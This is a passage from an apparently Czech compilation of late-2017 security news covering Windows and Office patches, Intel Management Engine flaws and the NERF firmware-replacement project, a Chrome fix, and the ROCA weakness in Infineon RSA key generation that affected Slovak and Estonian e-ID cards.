Volba frekvence dotazování se na zpětnou vazbu nebyla pokaždé uložena.
Síťová zařízení RNDIS 5 nezískala platnou adresu IP, případně nevykazovala síťovou aktivitu. Pokud vaše problémy budou přetrvávat, budete muset přeinstalovat Vzdálený NDIS síťový adaptér.
Manuální změna časového pásma, aniž byste počítač restartovali či se odhlásili, se neprojevila na zobrazovaném čase na zamykací obrazovce.
Některé tiskárny Epson SIDM a TM netiskly na systémech architektur x86 a x64. Tento problém se týká aktualizace KB4048955 (tj. aktualizace z posledního záplatovacího úterý).
Na seznamu známých chyb přetrvává jen jediná položka, kterou už ale Microsoft řeší několik týdnů. Naštěstí se jedná o nepodstatnou věc, aspoň pro běžné uživatele a uživatelky: ve specifických situacích (tj. když pracujete s SQL Server Reporting Services) v rozbalovacích nabídkách na webech nemusí být možné se při prohlížení v Internet Exploreru posunout až dolů pomocí posuvníku.

Aktualizace pro další verze Desítek
Dne 22. listopadu pak Microsoft vydal aktualizaci KB4055254 pro Windows 10 v1703, jež sestavení systému povyšuje na 15063.729. Obsahuje pouze jeden lék, a sice na výše zmíněnou nemoc postihující tiskárny Epson.

Dále byla uvolněně aktualizace KB4051033 pro Windows 10 v1607, jež číslo sestavení zvedá na 14393.1914. Kromě výše uvedeného napravuje mnoho dalších chyb. Vydána byla pro změnu 27. listopadu. Aktualizace tedy vychází v různé dny. Nejvíce by vás měly zajímat první dvě uvedené, protože většina lidí používá právě tyto verze Desítek. Stále relativně čerstvý Fall Creators Update pohání 20,5 % zařízení s Windows 10.

Microsoft Office obsahuje 17 let starou chybu. Zneužívají ji hackeři

3.12.2017 Novinky/Bezpečnost Zranitelnosti
Populární kancelářský balík Office od společnosti Microsoft má kritickou bezpečnostní chybu. Americký softwarový gigant sice již vydal pro tuto trhlinu opravu, ale je takřka jisté, že ji nezanedbatelná část uživatelů ještě nenainstalovala. A právě na ně se nyní zaměřují počítačoví piráti, uvedl server The Hacker News.
Problém se týká kancelářských balíků Office 2007, 2010, 2013 a 2016.

Trhlina se týká editoru rovnic, který je nedílnou součástí balíku Office. Jde však o velmi starý program, který si odbyl premiéru už v roce 2000.

A po 17 letech v tomto modulu, který využívají velmi často studenti, byla nalezena kritická bezpečnostní chyba. Tu mohou počítačoví piráti zneužít k tomu, aby do PC nainstalovali prakticky jakýkoliv škodlivý kód, klidně mohou i počítač ovládnout na dálku.

Útočníci podstrčí speciálně upravený dokument
Stačí přitom, aby oběť otevřela speciálně upravený dokument, čímž kyberzločincům otevře zadní vrátka do operačního systému.

Bezpečnostní experti ze společnosti Fortinet nyní zachytili již několik škodlivých kódů, které se snaží tuto trhlinu zneužít. Útočníci sází na to, že celá řada uživatelů podceňuje zabezpečení svých PC a nestahuje pravidelně aktualizace. A to ani ty důležité – bezpečnostní.

Tito uživatelé tak dávají svůj počítač všanc počítačovým pirátům.

Nainstalovat aktualizace. Neprodleně
Trhlina se týká kancelářských balíků Office 2007, 2010, 2013 a 2016. Editor rovnic je v nich začleněn jako základní funkce. Teoreticky mohou být postiženi také majitelé balíků Office 2000 a 2003, v těchto verzích se však modul instaloval volitelně.

Uživatelé dotčených kancelářských balíků by měli neprodleně nainstalovat všechny bezpečnostní aktualizace, které jsou aktuálně k dispozici. Stahovat se dají přímo z prostředí Office, případně prostřednictvím služby Windows Update.

Děravý Intel Management Engine lze nahradit minimalistickým Linuxem a Go
24.11.2017 Root.cz Zranitelnosti

Uvnitř procesorů Intel běží skrytě plnohodnotný operační systém včetně síťového stacku a web serveru. Zbavit se ho zcela není možné, ale můžeme ho nahradit něčím minimalistickým a méně děravým.

Už víme, že uvnitř procesorů Intel běží velmi mocný firmware založený na operačním systému MINIX. Už v něm byly nalezeny první vážné bezpečnostní chyby, které mohou vést až k ovládnutí celého počítače na dálku. Není se čemu divit, MINIX není maličký firmware nutný k běhu procesoru, ale plnohodnotný operační systém, který obsahuje například podporu pro IPv4 a IPv6, ovladače, souborový systém nebo třeba web server.

Běží navíc ve velmi privilegovaném režimu, ke kterému nemá běžný operační systém přístup, takže běží zcela skrytě a může provádět prakticky cokoliv za zády uživatele. Není divu, že se uživatelé takové věci ve svém počítači bojí a velké firmy v čele s Googlem se jí snaží zbavit. Protože není snadné takovou věc vypnout, přichází ke slovu jiné řešení: otevřené, minimalistické a postavené na Linuxu.

Proprietární software ve vašem CPU
Detaily celého projektu popsal Ronald Minnich z Google na pražské Embedded Linux Conference Europe. To je člověk, který stojí za vývojem nástroje Coreboot, který byl dříve znám pod názvem LinuxBIOS. Jeho cílem je nahradit uzavřený BIOS v základních deskách něčím otevřeným. Principiálně jde tedy o podobný problém, ale na zcela jiné softwarové vrstvě.

Hlavní problém podle Minnicha je v tom, že Linux ztratil kontrolu nad hardwarem. V 90. letech byl operační systém pánem celého stroje a mohl provádět cokoliv. Dnes jsou mezi ním a hardwarem minimálně další dvě a půl jádra. Mají vyšší práva než operační systém a mohou manipulovat s ním i s hardware. Navíc jsou uzavřená a samozřejmě také úspěšně exploitovatelná.

Co víc, exploity je možné zapsat přímo do paměti v desce, takže zůstávají persistentní a není možné je odstranit. V takovém stavu zbývá jen desku zahodit. Pokud svému počítači věříte, jste šílenci, řekl na své přednášce Minnich. Na vašem procesoru totiž běží ohromné množství proprietárního software, o kterém nevíte téměř nic a nemůžete ho nahradit. Naštěstí existují lidé, kteří pracují na tom, abychom přestali být šílení a získali trochu příčetnosti.

Co mi to tu běží?
Pokud chceme pochopit rozvrstvení operačních systémů ve svém procesoru, musíme se zabývat takzvanými Ringy (kruhy). Ty tvoří jednotlivé vrstvy a dovolují řídit procesy ve vyšších kruzích. Tradičně nejnižším, a tedy hlavním, kruhem býval ten s číslem nula. V něm běží jádro operačního systému, které řídí činnost uživatelského software ve vyšších kruzích – dnes typicky v tom s číslem tři.

Aby bylo možné provozovat jednoduše hardwarovou virtualizaci, přišel do nových procesorů (společně s Intel VT-x a AMD AMD-V) kruh s číslem –1. V něm běží hypervizor, tedy virtualizační hostitel, který si pak založí kruhy nula a v nich spouští běžné operační systémy. Má tedy vyšší privilegia a je pro ně neviditelný.

Ještě nad touto vrstvou pak existuje Ring –2, který se stará o samotný hardware a ke kterému nemají vyšší kruhy vůbec přístup. V něm běží 16bitové mikrojádro SMM starající se o zdroje v CPU a 64bitové UEFI jádro. Tyhle věci se starají o to, aby fungovaly například různé „hardwarové“ funkce počítačů – když třeba zaklapnete displej u notebooku, probudí se právě tyhle kusy software a zajistí třeba uspání.

Tady jsme si dlouho mysleli, že to končí. Ukázalo se ale, že existuje ještě privilegovanější režim označený analogicky jako Ring –3. To je ta věc, které se lidé bojí, říká Minnich. V něm totiž běží další plnohodnotný operační systém postavený na MINIX 3. Jednoduše to shrnuje následující schéma:

Operační systémy ve vašem procesoru

V kruzích –2 a –3 běží různý software, oba ale mají společné to, že se jedná o plnohodnotné operační systémy se spoustou vlastností: IPv4 a IPv6 stack, souborové systémy, ovladače pro různá zařízení (USB, disky, síťové karty a další) a také třeba web servery. Intel Management Engine (dále jen ME) totiž potřebuje znát souborový systém, protože může být použit k dálkovému přepsání operačního systému na disku. Jak Ronald Minnich připomíná, je možné to udělat i s vypnutým počítačem – pokud je zapojen v zásuvce a v síti.

Všude samá díra
Uvnitř navíc běží spousta komponent, jejichž smyslu nerozumíme. Mají rozličné názvy jako „full network manageability“, „regular network manageability“, „manageability“ a „outbreak containment heuristic“. Už v roce 2010 bylo ukázáno, že většina těchto komponent má bezpečnostní mezery [PDF] a část chyb stále ještě není opravená.

Že je to realita ukázal Intel na začátku roku, kdy opravil sedm let starou díru. Ta umožňovala na dálku do webového serveru v ME poslat heslo o nulové délce a získat plný přístup k dálkové správě počítače. Intel sice tvrdí, že nezaznamenal žádné pokusy o zneužití, ale v praxi je těžké uhlídat miliardu procesorů a není možné sledovat provoz všude. Navíc při takovém množství nikdy nebudou záplatovány všechny systémy.

O úroveň výše běží už zmíněný SMM, který původně sloužil ke správě napájení u starých systému s DOS. Přebírá od operačního systému řízení v případě, že přijde některá ze zajímavých událostí (SMI). Zajímavé je, že jakmile je SMM aktivován, už není možné jej vypnout. Ukousne si 8 MB systémové paměti, do které přestane vidět operační systém. Navíc pro něj existuje celá řada exploitů.

Ve stejném kruhu běží ještě zmíněné UEFI, což je prý extrémně komplexní kernel, pro nějž dopisují funkce jednotliví dodavatelé počítačů. Podle Minnicha ovšem jejich programátoři úplně dobře nerozumí všem pravidlům takového kódu, proto dělají chyby. Výsledkem je, že jsou tam obrovské gigantické díry, kterými je dovnitř možné dostat exploit. Těch existuje velké množství, navíc UEFI aktualizuje sám sebe, takže je možné vytvořit perzistentní malware, který se usídlí uvnitř UEFI a bude se při dalších pokusech o aktualizace tvářit, že všechno funguje správně.

Komponenty UEFI

Jak to celé opravíme?
Co s takovou bezpečnostní noční můrou můžeme dělat? Přejít na AMD není řešením, protože i tam existují uzavřené části, do kterých nevidíme. Vznikl proto projekt, který se snaží minimalizovat privilegovaný software uvnitř procesoru, aby ubylo kódu, snížilo se riziko bezpečnostních děr a omezily se schopnosti těchto potenciálně děravých firmwarů.

Výsledkem je projekt s názvem Non-Extensible Reduced Firmware, neboli nerozšiřitelný zmenšený firmware, zkráceně NERF. Nerozšiřitelný je, protože se vývojáři domnívají, že právě rozšiřitelnost je hlavním problémem originálního software.

Hlavním cílem je udělat minimální firmware, se kterým by počítač správně bootoval a fungoval. Zároveň s tím přichází podstatně větší otevřenost a možnost kdykoliv velmi rychle opravit případné chyby. Prakticky je to realizováno tak, že z původního firmware jsou odstraněny téměř všechny komponenty – zrušit ME úplně není možné, počítač by bez něj nenabootoval a pokud už ano, za 30 minut by se sám vypnul. Dobrou zprávou ale je, že většinu komponent ME je možné odstranit.

Vznikla proto velmi okleštěná náhrada, která nebude obsahovat web server, síťové stacky a ovladače hardware. Standardní ME zabírá 5 MB z integrované 8MB flash paměti, ale tuto velikost se podařilo redukovat na pouhých 300 KB. Kromě toho jsou z ME a UEFI odstraněny také schopnosti vlastní aktualizace, takže o případné flashování se postará sám NERF.

Nad vším sedí Linux
NERF se skládá z několika částí: osekanou ME ROM, minimalizovanou UEFI ROM a vypnutým SMM. Nad tím vším sedí linuxové jádro s uživatelským prostředím napsaným v Go (u-root). Neexistuje příliš mnoho důvodů proč mít SMM zapnuté, pokud by však některá z jeho funkcí byla v budoucnu potřeba, dokáže ji zastat Linux.

Během bootu počítače nejprve proběhnou dvě fáze (security neboli SEC a pre-EFI initialization čili PEI), které jsou kompletně proprietární a jejich funkce nebudou nikdy zveřejněny. Poté ale už nastupuje driver execution environment (DXE), což je naopak dobře dokumentovaná funkce starající se například o výběr operačního systému a jeho zavedení. O tuto část už se může postarat integrované linuxové jádro.

Některé části svázané přímo s hardwarem pravděpodobně nebudeme schopni nikdy nahradit, ale cílem je hlavně vyměnit ty velké komplexní komponenty, které ukrývají nejvíce bezpečnostních děr a jsou proto největším problémem. V tuto chvíli už je možné NERF sestavit a nabootovat, zatím je nejlepších výsledků dosahováno na serverech od firem Dell, MinowMax a OCP nodech.

Použití tohoto alternativního firmware také dovoluje výrazně zjednodušit správu. Zatímco v případě UEFI je nutné mít pro každý hardware jiné sestavení, použití univerzálního linuxového jádra většinu těchto problému ruší. Samozřejmě se předpokládá, že budou prováděny různá jádra pro různé systémy, ale už teď se daří startovat stejný firmware na malých deskách MinnowMax i na velkých OCP systémech.

Uživatelská část celého firmware je napsána v jazyce Go, který je bezpečnější než čisté C, takže lze předpokládat menší množství bezpečnostních děr. Výsledkem je 5,9MB initramfs, který obsahuje kompletní kód, kompilátor i toolchain. Jednotlivé funkce se kompilují až při použití, což zabere asi 200 ms. Podle Minnicha je to dobré proto, že je kód stále k dispozici v otevřené podobě vhodné k auditu.

Pro případy, kdyby ve flash paměti nebylo dost místa nebo by procesor byl na kompilaci příliš pomalý, je možné použít režim u-root, který je podobný BusyBoxu. Jde také o jednu velkou binárku, na kterou jsou nalinkovány jednotlivé názvy příkazů. V tomto formátu má pak celý userspace jen 2 MB a jeho provoz je velmi rychlý i na pomalých strojích. Protože je celý software velmi malý a jednoúčelový, zkracuje také dobu bootu celého počítače.

Ronald Minnich předpokládá, že se první počítače s NERF a u-root objeví už v roce 2018. Firmy chtějí používat firmware, kterému rozumí. Chtějí také bootovat rychle a bezpečně, říká Minnich.

Intel potvrzuje: v Management Engine jsou vážné bezpečnostní díry
23.11.2017 Root.cz Zranitelnosti
Intel potvrdil, že bezpečnostní audit provedený na jeho procesorech odhalil vážné bezpečnostní hrozby. Ty mohou vést až ke spuštění cizího nepodepsaného kódu hluboko v procesoru, kde na něj operační systém nevidí.

Když pánové Maxim Goryachy a Mark Ermolov ze společnosti Positive Technologies oznámili, že na prosincové konferenci Black Hat odhalí bezpečnostní slabiny v procesorech Intel, nechal jejich výrobce udělat velký audit technologií Intel Management Engine (ME), Intel Trusted Execution Engine (TXE) a Intel Server Platform Services (SPS).

Výsledkem je objevení většího množství bezpečnostních chyb uvnitř firmware, který běží na novějších procesorech. V těch je hluboko (ring –3) ukrytý operační systém MINIX, který provádí spoustu činností a dovoluje počítač spravovat na dálku. Goryachy a Ermolov tvrdí, že jimi objevené chyby dokáží ovládnout počítač i ve vypnutém stavu.

Problém přitom postihuje poměrně širokou škálu procesorů, konkrétně těch s firmwarem ME verzí 11.0, 11.5, 11.6, 11.7, 11.10 a 11.20, firmware SPS verze 4.0 a TXE verze 3.0. Verze jednotlivých komponent je obvykle možné najít v BIOS/UEFI, kde pravděpodobně najdete jen jednu z těchto technologií.

ME je možné najít na klientských stanicích a levných serverech bez samostatného řídicího rozhraní (IPMI). SPS je pak přítomno ve velkých serverech s tímto rozhraním a TXE je určeno především pro tablety a zařízení s nízkým příkonem.

Nebezpečné rozhraní je možné najít na následujících procesorech:

6th, 7th & 8th Generation Intel® Core™ Processor Family
Intel® Xeon® Processor E3–1200 v5 & v6 Product Family
Intel® Xeon® Processor Scalable Family
Intel® Xeon® Processor W Family
Intel® Atom® C3000 Processor Family
Apollo Lake Intel® Atom Processor E3900 series
Apollo Lake Intel® Pentium™
Celeron™ N and J series Processors
Podle Intelu je možné chyby zneužít k lokálnímu napadení počítače a spuštění libovolného kódu mimo dosah uživatele a operačního systému. Je také možné zhoršit stabilitu počítače nebo způsobit pád operačního systému.

Intel vydal testovací utilitu pro Linux a Windows, která prozkoumá váš hardware a software a pomůže vám odhalit bezpečnostní problémy v konkrétním počítači.

Výrobci už začali vydávat aktualizace firmware : Dell Client, Dell Server, Intel® NUC, Intel® Compute Stick a Intel® Compute (stránka podpory Intel), Lenovo. Oprava spočívá v aktualizaci BIOS/UEFI, který se při startu postará o nahrání opraveného firmware do procesoru.

Více informací zatím k dispozici není, podle Intelu jde o proaktivní řešení, které má za cíl významně zlepšit bezpečnost. Detaily budeme pravděpodobně znát až po konferenci Black Hat, zatím jen víme, že je ohroženo poměrně velké množství počítačů nejrůznějších typů a určení, protože v nich běží proecsory Intel.

Matthew Garrett
@mjg59
Thoughts on the latest Intel ME vulnerabilities: based on public information, we have no real idea how serious this is yet. It could be fairly harmless, it could be a giant deal.

11:01 PM - Nov 20, 2017
7 7 Replies 158 158 Retweets 201 201 likes
Twitter Ads info and privacy
Dobrou zprávou je, že podle dostupných informací je ke zneužití chyb potřeba mít fyzický přístup k počítači. Intel ale poznamenává, že teoreticky může přijít nový vektor útoku, který dovolí zaútočit s administrátorskými právy v operačním systému. Vzhledem k tomu, že některé zde zmíněné problémy dovolují si práva navýšit, je možné, že bude stačit běžný uživatelský účet, ze kterého pak povede cesta dál.

Chrome má kritickou chybu. Týká se Windows, Macu i Linuxu

13.11.2017 Novinky/Bezpečnost Zranitelnosti
Uživatelé internetového prohlížeče Chrome by se měli mít na pozoru. Byla v něm totiž objevena kritická bezpečnostní chyba, kterou mohou zneužít počítačoví piráti. Záplatu je naštěstí možné již stahovat.

Před nově objevenou trhlinou varoval český Národní bezpečnostní tým CSIRT.CZ.

„Společnost Google vydala verzi Chrome 62.0.3202.89. Verze opravuje zranitelnosti, u kterých útočník mohl získat kontrolu nad systémem,“ prohlásil Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Jak je z řádků výše patrné, chyba je kritická. To jinými slovy znamená, že útočníci mohou do počítače propašovat prakticky jakýkoli škodlivý kód. Klidně mohou i na dálku počítač zotročit a využít jej k DDoS útokům, rovněž mohou i odposlouchávat komunikaci uživatele, která na počítači probíhá.

V ohrožení všechny systémy
Ohroženi jsou přitom majitelé prakticky všech aktuálně dostupných operačních systémů. „Záplaty se vztahují na operační systémy Windows, Mac OS a Linux,“ zdůraznil Bašta.

V případě automatických aktualizací se uživatelé Chromu nemusejí o nic starat. Pokud je však tato funkce vypnuta, je nutné navštívit webové stránky tvůrců a nejnovější záplatovanou verzi stáhnout manuálně.

„Doporučujeme uživatelům a správcům aktualizovat Chrome,“ uzavřel bezpečnostní expert.

Zranitelnost ROCA: co se děje se slovenskými a estonskými e-občankami?
7.11.2017 Lupa.cz Zranitelnosti
Objev česko-slovenského vědeckého týmu z Masarykovy univerzity v Brně má nepříjemné důsledky pro elektronické občanské průkazy na Slovensku, ale i v Estonsku.

Zatímco u nás doma se kolem občanských průkazů s čipem, elektronického podpisu a služeb eGovernmentu aktuálně nic moc neděje, na Slovensku se naopak „dějí věci“: v nedávných dnech zde orgány veřejné moci přestaly přijímat elektronická podání, podepsaná s pomocí tamních elektronických občanských průkazů, a 31. 10. 2017 (k času 18:23) pak byly zrevokovány všechny kvalifikované certifikáty vystavené k soukromým klíčům na těchto e-občankách. Jejich držitelé si nyní musí pořídit certifikáty nové.

Svým způsobem je to docela bomba, která ale nevybuchla jen na Slovensku. Postihla i další země, konkrétně také Estonsko. I zde nakonec museli revokovat všechny certifikáty na tamních e-občankách (k 3. 11. 2017) a vyzvat jejich držitele k získání nových certifikátů.

Ale proč? Co bylo příčinou? A co je ohroženo?

Zranitelnost ROCA
Za vším je výsledek bádání česko-slovenského týmu vědců z centra CRoCS (Centre for Research on Cryptography and Security) při Fakultě informatiky na Masarykově univerzitě v Brně, ve spolupráci se společností Enigma Bridge a italskou Ca' Foscari University.

Presenting now, The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli #CCS17 @acm_ccs #RealWorldImpact award winner

15:05 - 2. 11. 2017
1 1 odpověď 8 8 retweetů 13 13lajků
Informace o reklamách na Twitteru a soukromí
Svůj objev prezentovali minulý týden na konferenci ACM CCS 2017, kde za něj dostali jedno ze dvou hlavních ocenění (Real-World Impact Award).

Zdroj: DSL.SK
Podstatou je nalezení chyby v jedné konkrétní softwarové knihovně (RSA Library version v1.02.013 od německé společnosti Infineon), která se využívá v některých krypto-čipech (a to již od roku 2012) pro generování klíčových párů (soukromého a veřejného klíče) pro podpisové schéma RSA. Konkrétně chybuje v generování velkých prvočísel, které jsou u RSA základem pro výpočet obou klíčů. Používá k tomu „urychlovací algoritmus“ Fast Prime, který ale v daném případě negeneruje ona prvočísla tak, jak by správně měl.

Nalezená chyba pak v konkrétních případech (při použití klíčů generovaných touto knihovnou) nabourává základní předpoklad pro praktickou použitelnost elektronického podpisu: že z veřejného klíče není možné odvodit (vypočítat) klíč soukromý. Přesněji: že to nejde rychleji než za dobu tak dlouhou a s takovými náklady, že už by to pro nikoho nemělo cenu. Bohužel z veřejného klíče, který byl vygenerován onou chybující knihovnou, lze soukromý klíč odvodit mnohem rychleji – tak rychle (a s relativně nízkými náklady), že už by se to někomu mohlo vyplatit.

Za jak dlouho by se to podařilo, uvádí autoři v popisu svého objevu: pro dnes nejčastěji používané klíče o velikosti 2048 bitů je to (v nejhorším případě) cca 140 roků běhu jednoho vlákna běžně dostupného CPU. S tím, že výpočet (proces hledání) lze dobře paralelizovat a využít tak více vláken a celých procesorů současně, a tím násobně zkrátit reálný čas výpočtu, klidně i na dny, či dokonce hodiny. Odhad max. nákladů, které autoři uvádí pro prolomení klíče o velikosti 2048 bitů (nalezení soukromého klíče ke konkrétnímu veřejnému klíči), při použití cloudových služeb Amazon AWS c4, je asi 40 000 USD. Pro klíče o velikosti 1024 bitů by to pak bylo jen nějakých (maximálních) 80 USD.

Následně, již po zveřejnění na konferenci ACM, se v odborné komunitě objevily zprávy o možnosti ještě rychlejšího a levnějšího prolomení.

Takovéto prolomení, pro jehož vlastní verzi autoři použili označení ROCA (The Return of Coppersmith's Attack), už by pro někoho (se zlými úmysly) mohlo být reálně využitelné. S nedozírnými následky pro toho, jehož soukromý klíč by byl touto cestou odvozen (vypočítán).

Co je ve hře?
To, že z veřejného klíče není možné odvodit klíč soukromý, resp. že to nejde rychleji, než za nějakou opravdu extrémně dlouhou dobu, je alfou a omegou naší důvěry v elektronické podpisy i základním předpokladem pro možnosti jejich praktického využití. Tedy alespoň u „skutečných“ elektronických podpisů, které jsou založeny na algoritmech a metodách kryptografie a které bychom správně měli označovat spíše jako digitální. Neformálně si je můžeme představovat také jako „počítané“ (ve smyslu: vznikající výpočtem).

Zdůrazňuji to proto, že naše legislativa používá pojem „elektronický podpis“ i pro takové úkony v elektronickém světě, které s kryptografií nemají nic společného, s žádnými klíči vůbec nepracují a u kterých ani není co počítat, co ověřovat, natož pak prolamovat. Ani na co se spoléhat – ale to by bylo na jiné povídání (které už jsem jednou zde na Lupě publikoval).

Pokud tedy zůstaneme u těch elektronických podpisů, které vychází z algoritmů a metod kryptografie a které se soukromými a veřejnými klíči pracují – pak si musíme uvědomit, jak fungují: při podepisování (vytváření elektronického podpisu) podepisující osoba používá svůj soukromý klíč, zatímco platnost již vytvořeného podpisu si protistrana (příjemce, resp. tzv. spoléhající se osoba) ověřuje pomocí veřejného klíče. To znamená, že podepisující osoba si musí pečlivě hlídat svůj soukromý klíč, aby s ním nemohl vládnout nikdo jiný (protože jinak by se mohl podepisovat místo ní). A naopak: veřejný klíč potřebuje mít k dispozici každý, kdo nějaký podepsaný dokument přijímá a má mít možnost si ověřit jeho platnost.

Proto je nutné, aby oprávněný držitel soukromého klíče mohl bez obav dát odpovídající veřejný klíč skutečně komukoli: musí mít jistotu, že ten, kdo jeho veřejný klíč získá, z něj nebude moci odvodit (vypočítat) odpovídající soukromý klíč. Přesněji: že to nedokáže tak rychle, aby ho mohl jakkoli zneužít.

V praxi se veřejné klíče rozdávají nikoli samostatně, ale jako součást certifikátů vystavovaných certifikačními autoritami. Certifikát je vlastně jakési dobrozdání či osvědčení od třetí důvěryhodné strany (certifikační autority), určené širší veřejnosti. Říká, kdo prohlašuje za svůj ten soukromý klíč, kterému odpovídá veřejný klíč obsažený v certifikátu. Podle toho se pak, při ověřování elektronického podpisu (pomocí veřejného klíče), tento podpis přisuzuje konkrétnímu původci. Tj. za podepsanou osobu se považuje ta osoba, jejíž identita je uvedena v certifikátu.

Nicméně samotný soukromý klíč v certifikátu obsažen není a být ani nemůže, a to již z principu (protože certifikáty jsou v zásadě veřejné).

Bývá dobrým zvykem přikládat takovýto certifikát přímo ke konkrétnímu elektronickému podpisu, aby jej příjemce měl k dispozici a nemusel jej sám někde hledat. Třeba na webu té certifikační autority, která certifikát vydala – protože standardním postupem (pokud držitel certifikátu neřekne jinak) je to, že jej autorita zveřejní sama.

V praxi to reálně znamená, že držitel soukromého klíče nemá žádnou kontrolu nad tím, jak se dále šíří jeho veřejný klíč, obsažený v příslušném certifikátu. Kdokoli si ho mohl stáhnout (z webu vydavatele), nebo ho získal z kteréhokoli podepsaného dokumentu, ke kterému se mohl dostat jakkoli. Ostatně, i tomu vděčí veřejný klíč za svůj přívlastek („veřejný“).

Proto je jakékoli narušení základního principu – že z veřejného klíče nejde reálně odvodit klíč soukromý – tak nebezpečné. Protože ten, kdo by si soukromý klíč přeci jen dokázal (v nějakém „ještě únosném“ čase) z veřejného klíče odvodit, by se mohl podepisovat místo oprávněného držitele soukromého klíče. A nikdo by už nedokázal rozlišit, kdo je skutečným autorem konkrétního podpisu.

Se znalostí soukromého klíče by pak mohl ten, kdo zná jeho hodnotu, elektronicky podepsat třeba smlouvu o prodeji domu, který patří oprávněnému držiteli soukromého klíče. A to bez jeho vědomí, ale vlastně jeho jménem. Pokud by se jednalo o soukromý klíč, ke kterému byl vystaven kvalifikovaný certifikát, šlo by (zde v ČR) o tzv. uznávaný elektronický podpis a jím podepsanou smlouvu by Katastr měl akceptovat jako součást žádosti o vklad. Obdobně pro všechny právní úkony (právní jednání), které lze realizovat elektronickou cestou za použití uznávaných elektronických podpisů. Raději nedomýšlet…

Nedivme se proto, že na Slovensku dočasně přestali přijímat takovéto elektronické podpisy (u kterých prolomení hrozí) a že dochází k revokaci již vystavených certifikátů a vydávání nových. Je spíše otázkou, zda jsou tato opatření dostatečná a zda nepřichází pozdě.

Kde nebezpečí hrozí a jak bylo zveřejněno?
Zdůrazněme si, že právě popsaná zranitelnost (ROCA) se netýká samotného principu fungování (digitálních, kryptografických, resp. „počítaných“) elektronických podpisů. Nejde o žádnou chybu či problém celého jejich konceptu, ani podpisového schématu RSA jako takového. Jde o důsledek chyby jednoho konkrétního softwaru (knihovny), kterou je třeba opravit a napravit přímé důsledky této chyby.

Výzkumný tým podle svého vyjádření odhalil popisovanou zranitelnost (chybu) koncem ledna tohoto roku. Zjistil, že německá společnost Infineon Technologies AG svou chybující knihovnu využívá ve svých čipech, které jsou základem různých kryptografických modulů (TPM, Trusted Platform Module), stejně jako čipových karet a USB tokenů.

Proto tým z MU v Brně ihned informoval společnost Infineon o svém zjištění a v duchu principu tzv. zodpovědného odhalení (Responsible disclosure) počkal plných 8 měsíců se zveřejněním svého zjištění. A i toto zveřejnění „rozfázoval“ do dvou hlavních etap: nejprve (v polovině října) zveřejnil obecnější popis celého zjištění (např. zde) a teprve na konci října a přelomu listopadu pak na již zmiňované konferenci ACM (CCS 2017) představil detaily.

Ona prodleva 8 měsíců umožnila, aby výrobce vadných čipů stihl zareagovat a aby se mohlo zjistit, kam všude se chyba rozšířila – koho a co zasáhla. Prohlášení samotné společnosti Infineon je ale jen dosti obecné, když hovoří jen o „informování zákazníků“ a nabídce cest ke „zmírnění dopadů“.

Dlužno dodat, že německá společnost Infineon není zdaleka jediným výrobcem kryptografických čipů a také ne všechny její produkty mají v sobě „zadrátovánu“ onu chybující knihovnu. A navíc, podle jejího prohlášení, se nalezená zranitelnost (chyba) projevuje jen tam, kde je u oné knihovny zapnuta akcelerace při hledání prvočísel pro potřeby generování klíčového páru.

Jinými slovy: nalézt konkrétní produkty či služby, které nalezenou zranitelností trpí, je poněkud složitější.

Dnes již víme, že zranitelnost se týká například čipů řady SLE78CFX3000P v nových elektronických občankách na Slovensku (ale stejně tak e-občanek v Estonsku a zřejmě i v Rakousku). Ale díky kryptomodulům TPM (Trusted Platform Module) je dosah celého problému nejspíše mnohem širší a „mapování“ jeho dosahů stále probíhá.

Různých seznamů toho, na co (a na koho) nově objevená zranitelnost dopadá, je samozřejmě více. Asi nejsystematičtější a nejrozsáhlejší přehled, který jsem zatím našel, publikoval a dále aktualizuje britský National Cyber Security Centre: podle něj se zranitelnost týká například platformy ChromeOS, zařízení Yubikey či autentizační karty Gemalto IDPrime.Net, ale také platformy Windows. Zde, na platformě Windows, jde například o použití služby BitLocker s TPM 1.2. Zmíněný seznam britské NCSC pak obsahuje i odkazy na weby příslušných výrobců, kde oni sami informují o postupech řešení a nápravy.

Jak zjistit, zda jste ohroženi?
Možná nejjednodušší cestou, jak zjistit, zda se nově objevená zranitelnost týká i vás, je využít „detekčních“ prostředků, které zpřístupnili sami autoři objevu. Podařilo se jim totiž najít způsob, jak přímo (a pouze) z veřejného klíče snadno a rychle poznat, zda je, či není ohrožen zranitelností ROCA.

Odkazy na tyto prostředky najdete v popisu celé zranitelnosti a jsou dostupné jak pro off-line použití, tak i pro využití on-line. Existuje i jejich emailová verze: pokud na adresu roca@keychest.net pošlete elektronicky podepsaný email, jako odpověď dostanete zprávu o tom, zda váš veřejný klíč (obsažený v podpisovém certifikátu) je v bezpečí.

Nejjednodušší je asi využít on-line verze nástrojů a nechat si zkontrolovat přímo své certifikáty: sám jsem si takto ověřil všechny své kvalifikované i nekvalifikované certifikáty od tuzemských (i zahraničních) vydavatelů a žádný z nich nebyl zranitelností postižen.

Ověřil jsem si takto i starší a dnes již neplatný certifikát, vystavený k soukromému klíči generovanému na mém (českém) občanském průkazu s čipem, a i zde bylo vše v pořádku.

K čemu jsou elektronické občanky?
Naše stávající občanské průkazy s čipem, vydávané od 1. 1. 2012, tedy zřejmě nejsou zranitelností ROCA ohroženy. Už i proto, že jsou vlastně starší a používají technologie dostupné ještě před rokem 2012 (zatímco ona chybující knihovna od společnosti Infineon pochází právě z roku 2012).

Navíc je dobré si připomenout, že naše stávající občanské průkazy, a to i ve verzi s čipem, vlastně vůbec nejsou elektronické. Jejich základní funkcí je prokazování totožnosti, resp. identifikace a autentizace – a z tohoto pohledu jsou jen prostým kusem plastu, na kterém jsou natištěny potřebné údaje (včetně fotografie držitele). Však také tyto své funkce plní úplně stejně i ve verzi bez čipu.

Varianta s čipem, kterou si za příplatek 500 Kč pořídilo jen úplné minimum lidí, podle původních představ možná měla nějak umožňovat a podporovat elektronickou identifikaci a autentizaci, ale zákonodárci to bohužel „nedomysleli“ – když cestou práva umožnili využít onen čip pouze jako úložiště soukromých klíčů (a certifikátů) pro elektronický podpis. Navíc bez toho, že by tento čip, resp. celý občanský průkaz, prošel certifikací na bezpečný (dnes: kvalifikovaný) prostředek pro vytváření elektronických podpisů (SSCD, resp. QSCD).

Takže ve finále je to vlastně jen taková dvojkombinace: čistě plastová občanka, plus (necertifikovaná) čipová karta, kterou je možné využít pro elektronické podepisování. Ale nikoli formou nejspolehlivějšího kvalifikovaného elektronického podpisu, protože k tomu by byla nutná právě ona certifikace na bezpečný/kvalifikovaný prostředek (SSCD/QSCD).

